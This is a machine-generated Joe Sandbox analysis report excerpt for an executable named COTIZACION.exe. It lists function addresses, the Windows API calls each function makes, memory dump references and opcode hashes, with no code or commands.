Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 9ce89e61440179cb6e749ad94ad8171360b05b0ca1aaf4e4cb985fff4bcb6601
Instruction ID: be55c39df0921b966c114d36cc37567fb3b7bdd9f064ac6c709c36b544e3c3da
Opcode Fuzzy Hash: 9ce89e61440179cb6e749ad94ad8171360b05b0ca1aaf4e4cb985fff4bcb6601
Instruction Fuzzy Hash: E841B432404248AED7709F64FC85BDE37FEBBA0B33F204019F94E56252DB756985C650

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C

Function 00406616 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
String ID:
API String ID: 1879705256-0
Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D

Function 004066B4 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
CloseHandle.KERNEL32(?), ref: 004066EA

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79

Function 004068F9 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 004068FD
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15

Function 70022D14 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?), ref: 70022DD3

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f9283a66d2fad058b0aa10273f739c2b47a7375dcd5dc0b10ab366d8ce0cddd3
Instruction ID: bbb94ea985d37248bf57638408fdaa933b7129883741cf30f4bbc18622189d34
Opcode Fuzzy Hash: f9283a66d2fad058b0aa10273f739c2b47a7375dcd5dc0b10ab366d8ce0cddd3
Instruction Fuzzy Hash: 57419176800204AFEB109FA1EDC6B8D37B6EB54B37F30446AE504DA262D734A5429AC9

Function 004069E9 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4

Function 00406926 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4

Function 70021A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7002501C,00000004,00000040,70025034), ref: 70021A68

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9d5a371224f8d692970f8e46aec4d56ca0667546dec059c43661fe9bd4619a4c
Instruction ID: e752745b4308cea9c87d4b3da0d9a8f21f5db5326b0bd8f7532dd6f20b304af4
Opcode Fuzzy Hash: 9d5a371224f8d692970f8e46aec4d56ca0667546dec059c43661fe9bd4619a4c
Instruction Fuzzy Hash: 9AF0A272919740EEE3148F1AACC87093AE0B718777F30856EF64DDA362C3704102AB9E

Function 004062B6 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718

Function 004054C6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C

Function 004054E1 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D

Function 700212F8 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 1fa8008312811d2e097c1057552e11591f2a39d55fd7b351527a2dd34a631a07
Instruction ID: 1cc576f73056ce86a65e4eb34b2c2cfb32e86ee0fc4ffdd19389ac8c4d345c5a
Opcode Fuzzy Hash: 1fa8008312811d2e097c1057552e11591f2a39d55fd7b351527a2dd34a631a07
Instruction Fuzzy Hash: 58B002B26401005FFE409755DD9AF353654F740715F741050F705D5152D57458518959

Non-executed Functions

Function 004062E4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
wsprintfA.USER32 ref: 00406363
GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
